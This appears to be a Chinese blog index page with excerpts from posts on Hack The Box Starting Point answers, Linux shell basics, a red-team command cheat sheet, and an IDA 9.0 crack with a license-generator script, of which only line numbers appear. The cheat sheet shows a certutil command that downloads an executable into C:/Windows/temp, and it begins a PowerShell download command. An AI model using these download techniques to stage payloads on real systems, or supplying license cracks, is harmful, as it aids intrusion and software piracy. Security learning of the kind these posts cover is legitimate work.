Staring Point Tier 0 Meow实战笔记
0x0 What does the acronym VM stand for?
翻译:VM代表什么缩写?
答案:VM是(Virtual Machine)虚拟机的缩写。
0x1 What tool do we use to interact with the operating system in order to issue commands via the command line, such as the one to start our VPN connection? It’s also known as a console or shell.
翻译: 我们用来通过命令行与操作系统交互以发出命令的工具是什么,比如启动我们的VPN连接的那个?它也被称为控制台或shell。
答案:我们用来与操作系统交互以发出命令的工具叫做(Terminal)终端。
0x3 What service do we use to form our VPN connection into HTB labs?
翻译: 我们使用什么服务将我们的V ...
技术分享
未读1.1 Linux基础命令一、什么是Linux命令输入一串字符命令,由Shell将这条命令“翻译”为系统内核能够懂的“语言”,然后系统内核便根据这条命令去执行相关操作
什么是Shell?
Linux系统中运行的一种特殊程序
在用户和内核之间充当“翻译官”
用户登录Linux系统时,自动加载一个Shell程序
Bash是Linux系统中默认使用的Shell程序文件位于/bin/bash目录下
graph TD
User((用户)) -->Shell{Shell}
Shell -->Kernel{内核}
Kernel -->Hardware{硬件}
接收用户输入的指令↓
解释命令↓
传递给系统内核执行
二、命令提示符1[root@localhost ~]#
这是Linux系统的命令提示符,具体含义如下
[]:这是提示符的分隔符号,没有特殊含义,方便查看。
root:显示当前登录的用户名。
@:分隔符号,没有特殊含义。
localhost:当前系统的简写主机名(通过hostname命令查看完整主机名)。
~:代 ...
资源分享
未读红队命令速查-洞查文库
引用站外地址
洞查文库
文章出产的地方
Windows 命令速查TCP 出网探测1powershell Test-NetConnection -ComputerName [目标主机名或IP] -Port [端口号]
远程下载文件certutil123certutil.exe -urlcache -split -f "http://127.0.0.1:8080/file.exe" "C:/Windows/temp/file.exe"//从 http://127.0.0.1:8080/ 下载 file.exe 并保存到 C:/Windows/temp/file.exe
PowerShell1powershell -Command "Invoke-WebRequest -Uri 'https://www.e ...
IDA9.0 破解 来源:
看雪论坛|IDA 版本历代记
下载链接: 下载链接
Python代码版本的lic生成脚本
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821 ...